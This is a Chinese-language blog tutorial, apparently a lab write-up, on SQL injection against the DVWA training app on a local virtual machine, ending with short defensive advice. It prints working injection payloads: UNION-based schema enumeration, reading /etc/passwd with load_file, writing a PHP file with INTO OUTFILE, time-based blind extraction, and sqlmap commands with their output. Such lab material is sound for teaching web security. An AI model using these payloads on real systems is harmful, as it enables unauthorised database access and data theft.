目录
前言
SQL注入是相当重要的一种漏洞,在2019年的OWASP TOP 10中占据首位(https://cai.tools.sap/blog/top-10-web-security-vulnerabilities-to-watch-out-for-in-2019/)。其易于利用和检测,但危害却很大。
一、介绍
A SQL injection attack consists of insertion or "injection" of a SQL query via the input data from the client to the application. A successful SQL injection exploit can read sensitive data from the database, modify database data (Insert/Update/Delete), execute administration operations on the database (such as shutdown the DBMS), recover the content of a given file present on the DBMS file system and in some cases issue commands to the operating system. SQL injection attacks are a type of injection attack, in which SQL commands are injected into data-plane input in order to effect the execution of predefined SQL commands.
Reference: http://www.owasp.org/index.php/SQL_Injection
自己的理解
数据库中存放着整个网站的所有信息,一旦发生大规模信息泄露,对用户及网站运营者影响都十分巨大。而sql注入则可以在管理员不知情的情况下实现非法操作,执行非授权的任意查询,从而进一步得到相应的数据信息。
形成原因
恶意数据被当作代码和SQL语句拼凑到一起。
二、常见数据库注入
2.1、手动注入
2.1.1、两种注释方式
2.1.1.1、--加空格 注释
注入内容
1' or 1=1 -- 
2.1.1.2、# 注释
注入内容
1' or 1=1 #
2.1.2、获取敏感信息
2.1.2.1、查询有多少个可以查看的数据库:
注入语句
' union select distinct table_schema,1 from information_schema.tables #相当于
show databases;
information_schema 和 dvwa 两个数据库可以查看。
2.1.2.2、查询dvwa 数据库中有什么表
注入语句
' union select database(),table_name from information_schema.tables where table_schema='dvwa' #相当于
use dvwa;
show tables;
存在guestbook和users两个表
2.1.2.3、查询users的表结构
' union select 'users',column_name from information_schema.columns where table_schema='dvwa' and table_name='users' #
相当于
desc users;
users表存在 user_id、first_name、last_name、user、password和avatar六个字段。
2.1.2.4、查询数据库版本及当前数据库
注入代码
' union select version(),database() -- 
数据库版本:5.1.41-3ubuntu12.6-log; 当前数据库:dvwa;
2.1.2.5、文件读取
注入代码
' union select 1,load_file('/etc/passwd') #
读取文件失败,暂不清楚原因。
2.1.2.6、文件写入
注入代码
select '<?php phpinfo();?>' into outfile '/var/www/dvwa/hackable/uploads/database.php' #
文件写入失败。
2.1.3、盲注
一般网站的容错页面都做得非常好,无论在参数后面加什么语句都不会有变化,这样一来,就只能用盲注来判断。
延时注入
延时注入是盲注的一种,是一种基于时间差异的注入技术。
2.1.3.1、判断是否有注入点
注入语句
1' union select 1,sleep(2) #
根据页面返回的时间判断是否有注入点,若页面立即返回,则无注入点;若页面大约两秒后返回,则有注入点。
盲注判断当前用户
2.1.3.2、判断用户名长度
注入语句
#一次次尝试判断用户名长度
1' and if(length(user())=1,sleep(2),1) #逐渐增加,当注入语句为
1' and if(length(user())=14,sleep(2),1) #
时,返回页面有明显延迟,因此判断当前用户名长度为14。
2.1.3.3、逐字符判断用户名
注入语句
1' and if(hex(mid(user(),1,1))=1,sleep(2),1) #逐渐增加,当注入语句为
1' and if(hex(mid(user(),1,1))=64,sleep(2),1) #时,页面返回明显延迟,故当前用户名第一个字符ASCII码值的十六进制值为64,转换为十进制为100。对照ASCII表
第一个字符为d。
后面重复这个过程,得到当前用户名为dvwa@localhost
手动注入,特别是盲注的时候,如果一步步的做下去,速度真是慢的吓人,还好有自动注入。
2.2、SQLmap自动注入
注入
kali@kali:~$ sqlmap -u "https://192.168.75.130/dvwa/vulnerabilities/sqli/?id=d&Submit=Submit#" -p id --cookie="PHPSESSID=7f3hh4vn9u24ma220umveh3096;security=low" --batch --dbms=mysql
___
__H__
___ ___[.]_____ ___ ___ {1.4.2#stable}
|_ -| . [.] | .'| . |
|___|_ ["]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 05:02:40 /2020-03-30/
[05:02:40] [INFO] testing connection to the target URL
[05:02:40] [INFO] testing if the target URL content is stable
。。。。。。
[05:02:54] [WARNING] in OR boolean-based injection cases, please consider usage of switch '--drop-set-cookie' if you experience any problems during data retrieval
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 126 HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
Payload: id=d' OR NOT 9812=9812#&Submit=Submit
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=d' AND (SELECT 5584 FROM(SELECT COUNT(*),CONCAT(0x7176707671,(SELECT (ELT(5584=5584,1))),0x7171716a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- IFtX&Submit=Submit
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=d' AND (SELECT 1485 FROM (SELECT(SLEEP(5)))jzHt)-- erlz&Submit=Submit
Type: UNION query
Title: MySQL UNION query (NULL) - 2 columns
Payload: id=d' UNION ALL SELECT NULL,CONCAT(0x7176707671,0x53714242504c764a6475546c65476c6169674f734279695162466345726e43726748657853594d68,0x7171716a71)#&Submit=Submit
---
[05:02:54] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0
[05:02:54] [INFO] fetched data logged to text files under '/home/kali/.sqlmap/output/192.168.75.130'
[*] ending @ 05:02:54 /2020-03-30/
kali@kali:~$
查询当前数据库
kali@kali:~$ sudo sqlmap -u "https://192.168.75.130/dvwa/vulnerabilities/sqli/?id=d&Submit=Submit#" -p id --cookie="PHPSESSID=7f3hh4vn9u24ma220umveh3096;security=low" --batch --dbms=mysql --current-db
05:10:01] [INFO] fetching current database
[05:10:01] [WARNING] reflective value(s) found and filtering out
current database: 'dvwa'
[05:10:01] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.75.130'
[*] ending @ 05:10:01 /2020-03-30/
查询主机名
kali@kali:~$ sudo sqlmap -u "https://192.168.75.130/dvwa/vulnerabilities/sqli/?id=d&Submit=Submit#" -p id --cookie="PHPSESSID=7f3hh4vn9u24ma220umveh3096;security=low" --batch --dbms=mysql --hostname
05:10:46] [INFO] testing MySQL
[05:10:46] [INFO] confirming MySQL
[05:10:46] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.0
[05:10:46] [INFO] fetching server hostname
[05:10:46] [WARNING] reflective value(s) found and filtering out
hostname: 'owaspbwa'
[05:10:46] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.75.130'
[*] ending @ 05:10:46 /2020-03-30/
三、防御措施
1,对特殊字符如单引号等进行转义。
2,使用预编译语句,从而使用户输入作为变量传给SQL语句。
3,使用LIMIT防止大规模数据泄露的发生
四、参考资料
http://www.owasp.org/index.php/SQL_Injection
《Web安全深度剖析》
216
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
